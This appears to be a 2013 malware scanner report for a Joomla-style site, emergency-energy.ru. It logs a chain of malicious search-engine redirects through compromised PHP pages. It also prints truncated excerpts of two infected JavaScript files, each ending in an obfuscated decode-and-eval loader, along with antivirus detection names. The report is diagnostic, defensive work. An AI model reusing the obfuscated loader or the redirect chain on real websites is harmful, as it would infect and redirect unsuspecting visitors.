New scan:

Malware Scanner report for emergency-energy.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://tinyurl.com/c2td3xs
178 websites infected.
->http://gaviatravel.com/includes/phpinputfilter/www/0.php
763 websites infected.
->http://www.arcom-ivi.de/includes/domit/1.php
517 websites infected.

The website "emergency-energy.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://emergency-energy.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: emergency-energy.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Mon, 04 Nov 2013 15:23:13 GMT
Location: http://tinyurl.com/c2td3xs
Server: nginx/1.4.1
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.17
malicious
URL: http://tinyurl.com/c2td3xs
(imitation of visitor from search engine)

GET /c2td3xs HTTP/1.1
Host: tinyurl.com
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 04 Nov 2013 15:23:13 GMT
Location: http://gaviatravel.com/includes/phpInputFilter/www/0.php
Server: TinyURL/1.6
Content-Length: 0
Content-Type: text/html
Set-Cookie: tinyUUID=277bbe673ba34e9e0be2ddda; expires=Tue, 04-Nov-2014 15:23:13 GMT; path=/; domain=.tinyurl.com
X-Powered-By: PHP/5.4.19
X-Tiny: cache 0.0022289752960205
malicious
URL: http://gaviatravel.com/includes/phpInputFilter/www/0.php
(imitation of visitor from search engine)

GET /includes/phpInputFilter/www/0.php HTTP/1.1
Host: gaviatravel.com
Referer: http://www.google.com/search?q=redirect+check3
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 04 Nov 2013 15:23:13 GMT
Location: http://www.arcom-ivi.de/includes/domit/1.php
Server: Apache/2.2.3 (Red Hat)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.27
malicious

Scanned pages/files

RequestServer responseStatus
http://emergency-energy.ru/
200 OK
Content-Length: 9415
Content-Type: text/html
clean
http://emergency-energy.ru/media/system/js/caption.js
200 OK
Content-Length: 11715
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 10223 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

K7AntiVirus
Riskware
Comodo
TrojWare.JS.Agent.TC
F-Prot
JS/IFrame.SJ.gen
Norman
ShellCode.V
Commtouch
JS/IFrame.SJ.gen

http://emergency-energy.ru/templates/alternator/js/jquery.js
200 OK
Content-Length: 67006
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
... 65890 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
Comodo
TrojWare.JS.Agent.TC
Sophos
Troj/JSRedir-JN

http://emergency-energy.ru/templates/alternator/js/curvycorners.js
200 OK
Content-Length: 39852
Content-Type: application/x-javascript
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=3&Itemid=3
200 OK
Content-Length: 9631
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=4&Itemid=4
200 OK
Content-Length: 8403
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=5&Itemid=5
200 OK
Content-Length: 8419
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=6&Itemid=6
200 OK
Content-Length: 8455
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=7&Itemid=7
200 OK
Content-Length: 8391
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=8&Itemid=8
200 OK
Content-Length: 8531
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=9&Itemid=9
200 OK
Content-Length: 8550
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=10
200 OK
Content-Length: 11244
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=11
200 OK
Content-Length: 10401
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=12
200 OK
Content-Length: 10529
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=13
200 OK
Content-Length: 10424
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=emergency-energy.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://emergency-energy.ru/

Result: emergency-energy.ru is not infected or malware details are not published yet.